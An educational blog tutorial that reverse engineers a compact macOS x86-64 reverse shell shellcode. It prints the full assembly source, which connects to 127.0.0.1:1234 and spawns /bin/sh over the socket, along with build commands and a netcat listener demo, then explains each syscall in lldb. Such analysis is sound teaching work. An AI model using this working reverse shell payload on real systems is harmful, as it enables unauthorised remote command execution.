The reverse connect shell

MacOS Shellcode Primer #4

Abstract

In this series of articles, I am analysing the pieces of shellcode written by Odzhan on the page Shellcode: Mac OSX amd64.

In this last article, we put together what we have learnt so far and create a reverse connect shell.

Keywords

reverse connect shell, socket, sys_dup2, execve, connect.

The code

We start by compiling the code from the well-known website:

bits 64
global _main
_main:


; 79 byte reverse shell
;
    bits    64

    mov     rcx, ~0x0100007fd2040200
    not     rcx
    push    rcx

    xor     ebp, ebp
    bts     ebp, 25
    ; step 1, create a socket
    ; socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    push    rbp
    pop     rax
    cdq                      ; rdx=IPPROTO_IP
    push    1
    pop     rsi              ; rsi=SOCK_STREAM
    push    2
    pop     rdi              ; rdi=AF_INET
    mov     al, 97
    syscall

    xchg    eax, edi         ; edi=s
    xchg    eax, esi         ; esi=2

    ; step 2, assign socket handle to stdin,stdout,stderr
    ; dup2(r, FILENO_STDIN)
    ; dup2(r, FILENO_STDOUT)
    ; dup2(r, FILENO_STDERR)
dup_loop64:
    push    rbp
    pop     rax              ; eax = 0x02000000
    mov     al, 90           ; rax=sys_dup2
    syscall
    sub     esi, 1
    jns     dup_loop64       ; jump if not signed

    ; step 3, connect to remote host
    ; connect (sockfd, {AF_INET,1234,127.0.0.1}, 16);
    push    rbp
    pop     rax
    push    rsp
    pop     rsi
    mov     dl, 16           ; rdx=sizeof(sa)
    mov     al, 98           ; rax=sys_connect
    syscall

    ; step 4, execute /bin/sh
    ; execve("/bin//sh", NULL, 0);
    push    rax
    pop     rsi
    push    rbp
    pop     rax
    cdq                      ; rdx=0
    mov     rbx, '/bin//sh'
    push    rdx              ; 0
    push    rbx              ; "/bin//sh"
    push    rsp
    pop     rdi              ; "/bin//sh", 0
    mov     al, 59           ; rax=sys_execve
    syscall

Compiling this code is not different from the usual:

gbiondo@tripleX reverse connect shell % nasm -f macho64 rcs.asm 
gbiondo@tripleX reverse connect shell % ld -L /Library/Developer/CommandLineTools/SDKs/MacOSX.sdk/usr/lib -lSystem rcs.o -o reverseConnectShell

Now, from another terminal, we launch a netcat listener:

gbiondo@tripleX ~ % pwd
/Users/gbiondo
gbiondo@tripleX ~ % /usr/bin/nc -l  1234
...

And we launch the reverse shell:

gbiondo@tripleX reverse connect shell % ./reverseConnectShell

In the netcat terminal, we can now issue commands as if they were typed in the terminal that launched the shellcode:

gbiondo@tripleX ~ % /usr/bin/nc -l  1234
pwd
/Users/gbiondo/EXP312/Odzhan/reverse connect shell

It works fine.

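It must be observed that if there is no listener to connect to, the given shellcode crashes with a segmentation fault. The code never checks the return value of connect and has no exit path after execve, so a plausible explanation is that execution simply runs past the end of the code.

This time we opt for another strategy for the reverse engineering exercise. First, we collect all the syscalls the code invokes, and we look through their documentation, if needed.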

Last byte   Syscall signature
97          int socket(int domain, int type, int protocol);
90          int sys_dup2(u_int from, u_int to);
98          int connect(int s, caddr_t name, socklen_t namelen);
59          int execve(char *fname, char **argp, char **envp);

The syscalls shouldn’t be new to the aficionados of this series; if you missed the earlier articles, each of these calls is discussed there.

So the algorithm will be:

Screenshot 2022-04-29 at 09.54.52.png

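To save some time later, let's remember that, according to the System V AMD64 calling convention, the first three parameters go in RDI, RSI and RDX (the syscall number itself goes in RAX), so the registers shall contain the values described below: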

syscall     Parameter 1 (RDI)        Parameter 2 (RSI)   Parameter 3 (RDX)
socket      domain                   type                protocol
sys_dup2    from                     to                  n/a
connect     socket file descriptor   address             address length
execve      path                     arguments           environment variables

As I said in a previous article, when working with projects it’s always better to view both lldb and a visual disassembler. It gives a wide view of how the same result can be achieved in different manners. For instance, the original code:

    mov     rcx, ~0x0100007fd2040200
    not     rcx

has been disassembled by lldb as:

reverseConnectShell[0x100003f69] <+0>:  movabs rcx, -0x100007fd2040201
reverseConnectShell[0x100003f73] <+10>: not    rcx

and by Hopper as:

0000000100003f69         movabs     rcx, 0xfeffff802dfbfdff
0000000100003f73         not        rcx

Now, movabs and mov can be considered synonyms in this context (see this link for more information), and yet the operand is displayed in three different ways: as a complemented constant in the source, as a negative number by lldb, and as an unsigned hexadecimal number by Hopper.

The first case was already discussed in the article “Binding a shell”. We redo it once more here:

Screenshot 2022-04-29 at 10.16.00.png

This shows that the operand in the original code and the one shown by Hopper are equivalent.

Negative numbers are obtained with 2's complement, so we have:

Screenshot 2022-04-29 at 10.16.54.png

This finally proves that the three approaches are equivalent. As a point of interest, it’d have been way faster writing a simple piece of code:

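#include <stdio.h>

int main(void) {
    /* Magnitude of the operand shown by lldb: -0x100007fd2040201 */
    unsigned long magnitude = 0x100007fd2040201UL;
    /* Unsigned negation is the 2's complement: (~x) + 1, modulo 2^64 */
    unsigned long negated = 0UL - magnitude;
    printf("Original number made negative, in hex: %#lx\n", negated);

    return 0;
}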

Or, damnit! you may use any scientific calculator that has programming features!

Now that we agree on the data, we can proceed with the analysis. For the sake of clarity, I am subdividing the code into chunks, the separators being the syscall instructions (and the subsequent storing of the return value, if pertinent).

To make things clearer, I will also show the contents of the registers and the stack.

First chunk: invoking socket

In other words, this is the main program until the loop. The disassembled code is:

(lldb) disassemble -n main
reverseConnectShell`main:
reverseConnectShell[0x100003f69] <+0>:  movabs rcx, -0x100007fd2040201
reverseConnectShell[0x100003f73] <+10>: not    rcx
reverseConnectShell[0x100003f76] <+13>: push   rcx
reverseConnectShell[0x100003f77] <+14>: xor    ebp, ebp
reverseConnectShell[0x100003f79] <+16>: bts    ebp, 0x19
reverseConnectShell[0x100003f7d] <+20>: push   rbp
reverseConnectShell[0x100003f7e] <+21>: pop    rax
reverseConnectShell[0x100003f7f] <+22>: cdq    
reverseConnectShell[0x100003f80] <+23>: push   0x1
reverseConnectShell[0x100003f82] <+25>: pop    rsi
reverseConnectShell[0x100003f83] <+26>: push   0x2
reverseConnectShell[0x100003f85] <+28>: pop    rdi
reverseConnectShell[0x100003f86] <+29>: mov    al, 0x61
reverseConnectShell[0x100003f88] <+31>: syscall 
reverseConnectShell[0x100003f8a] <+33>: xchg   eax, edi
reverseConnectShell[0x100003f8b] <+34>: xchg   eax, esi

We have already seen what happens in <+0>. The effect of the operation <+10> is simply to flip every bit in RCX; the result is pushed onto the stack in <+13>.

Let's observe the result of the not, although the mechanism should be very clear by now:

Screenshot 2022-04-29 at 10.26.49.png

What is this all about

We didn’t look at the man page of the connect syscall, taking it somehow for granted. Let’s do it now.

man 2 connect gives:

int connect(int socket, const struct sockaddr *address, socklen_t address_len);

DESCRIPTION The parameter socket is a socket. If it is of type SOCK_DGRAM, this call specifies the peer with which the socket is to be associated; this address is that to which datagrams are to be sent, and the only address from which datagrams are to be received. If the socket is of type SOCK_STREAM, this call attempts to make a connection to another socket. The other socket is specified by address, which is an address in the communications space of the socket. Each communications space interprets the address parameter in its own way. Generally, stream sockets may successfully connect() only once; datagram sockets may use connect() multiple times to change their association. Datagram sockets may dissolve the association by calling disconnectx(2), or by connecting to an invalid address, such as a null address or an address with the address family set to AF_UNSPEC (the error EAFNOSUPPORT will be harmlessly returned).

Now, we have already seen a const struct sockaddr *address passed to a syscall when we analysed bind. We have seen how to calculate the length, which is 16 bytes, and how the fields are populated. Let’s briefly get back to that, remembering that the author wants to invoke connect with the parameters (sockfd, {AF_INET,1234,127.0.0.1}, 16). The first and the last should be immediate to understand, so we focus on the second one, namely {AF_INET,1234,127.0.0.1}.

  • The value of the constant AF_INET is 0x02.
  • 1234 is an immediate constant. In hex that value is represented as 0x04D2.
  • The remaining, 127.0.0.1, can be represented as 0x7F 0x00 0x00 0x01.
  • Finally, we know that the structure pointed to by address has an initial field, sin_len, which is 1 byte long and is set to 0x00 here.

All of these, taken together:

Screenshot 2022-04-29 at 11.10.33.png

This piece of code prepares the contents that address will point to.

However, the situation before <+13> is executed is:

Screenshot 2022-04-29 at 11.55.54.png

and after its execution we have:

Screenshot 2022-04-29 at 11.57.59.png

The next instruction (<+14>) zeroes ebp, the lower 32 bits of rbp; because a 32-bit write zero-extends on x86-64, this also clears the upper half of rbp. The one after (<+16>) sets bit 25 of the register to 1 (0x19 = 25, that is, the 26th bit counting from one – but this, too, should be clear by now).

This yields the value 0x0000000002000000 for the syscall without encoding any null bytes in the instructions. The constant is built once and then reused while preparing every syscall. In fact, the very next two instructions push the value onto the stack (<+20>) and pop it into rax (<+21>).

Screenshot 2022-04-29 at 12.16.09.png

The CDQ instruction (<+22>) sign-extends eax into edx. Since the sign bit of eax is clear, edx becomes 0, and with it the whole of RDX.

The effect of the two instructions <+23> and <+25> is to store the value 1 into rsi without generating null-bytes:

Screenshot 2022-04-30 at 08.26.18.png

and similarly, with <+26> and <+28> the value 2 is stored into rdi without generating null-bytes:

Screenshot 2022-04-30 at 08.28.04.png

Finally, <+29> writes 0x61 (97) into al, which turns rax into 0x02000061, and <+31> invokes the syscall. The situation before and after the syscall is reported below, changes highlighted in red:

Screenshot 2022-04-30 at 08.30.10.png

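A new socket is created, and its file descriptor (3) is returned in rax.

The remaining two instructions swap register contents. The first (<+33>) exchanges eax and edi, so edi receives the socket descriptor and eax receives 2; the second (<+34>) exchanges eax and esi, so esi receives 2 and eax receives 1. At the end of the execution we have: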

Screenshot 2022-04-30 at 08.35.53.png

Time to look at the next chunk.

dup_loop64

Note that lldb's offset numbering restarts at the dup_loop64 label and, since there is no further label, it keeps counting from there for the rest of the program, even past the jump instruction. This is actually meaningful, from the point of view of the assembly language - the humans must adapt to that :) But we won't surrender, and we'll stubbornly keep on subdividing into smaller chunks :)

reverseConnectShell[0x100003f8c] <+0>:  push   rbp
reverseConnectShell[0x100003f8d] <+1>:  pop    rax
reverseConnectShell[0x100003f8e] <+2>:  mov    al, 0x5a
reverseConnectShell[0x100003f90] <+4>:  syscall 
reverseConnectShell[0x100003f92] <+6>:  sub    esi, 0x1
reverseConnectShell[0x100003f95] <+9>:  jns    0x100003f8c               ; <+0>

At a glance, this routine is very easy to reverse: <+0>, <+1>, and <+2> prepare the syscall (<+4>), which takes the current value of rsi as its second argument. The initial value of rsi is 2 (STDERR); it then becomes 1 (STDOUT), and finally 0, which corresponds to STDIN. In short, the loop makes the three aforementioned streams refer to the socket, whose file descriptor sits in rdi and never changes. At each iteration rsi is decremented (<+6>), and the jump is taken only while the result is non-negative (<+9>). Easy peasy.

We show a quick example of how the registers are impacted by this loop. The initial push and pop:

Screenshot 2022-05-01 at 07.42.34.png

and the final ones:

Screenshot 2022-05-01 at 07.43.59.png

When the loop terminates, the values of the registers are as follows:

Screenshot 2022-05-01 at 07.46.05.png

This closes the dup_loop64 chunk.

Connect

This may seem the trickiest part of the whole exercise, because it really deals with the stack.

The code is:

reverseConnectShell[0x100003f97] <+11>: push   rbp
reverseConnectShell[0x100003f98] <+12>: pop    rax
reverseConnectShell[0x100003f99] <+13>: push   rsp
reverseConnectShell[0x100003f9a] <+14>: pop    rsi
reverseConnectShell[0x100003f9b] <+15>: mov    dl, 0x10
reverseConnectShell[0x100003f9d] <+17>: mov    al, 0x62
reverseConnectShell[0x100003f9f] <+19>: syscall

Let us focus on the contents of the stack, first. The stack pointer (rsp) contains the value 0x00007FF7BFEFFA20. At this location, the stack contains the previously built struct sockaddr. By now, the effect of the instructions <+11> and <+12> should be clear: they prepare the syscall number in rax. After the execution of those instructions, the stack pointer still contains the struct's address. That address is then stored in rsi with the usual push/pop mechanism (<+13> and <+14>), thus populating the second parameter of the syscall. The third parameter must be stored in rdx, whose lowest byte is set to 0x10 in <+15>. Finally, rdi, which contains the file descriptor of the socket, hasn't changed. The syscall number is completed in <+17>, and the syscall is invoked in <+19>.

The final part is the execution of the shell; we have already analysed it in previous articles. Please refer to them.

Conclusions

The aim of this series was manifold. First of all, I wanted to show that even with no assembly talent, we can understand shellcode (and we built some of that talent in the process, indeed!). I also wanted to show how to do static analysis. It's a lengthy process (the technical term is PitA) and error-prone, but it gives lots of satisfaction. Assembly is not the harsh monstrosity one expects it to be. It's not easy either, so you may want to build further skills on that. We have also seen some binary analysis.

... and all this, just by reverse engineering!
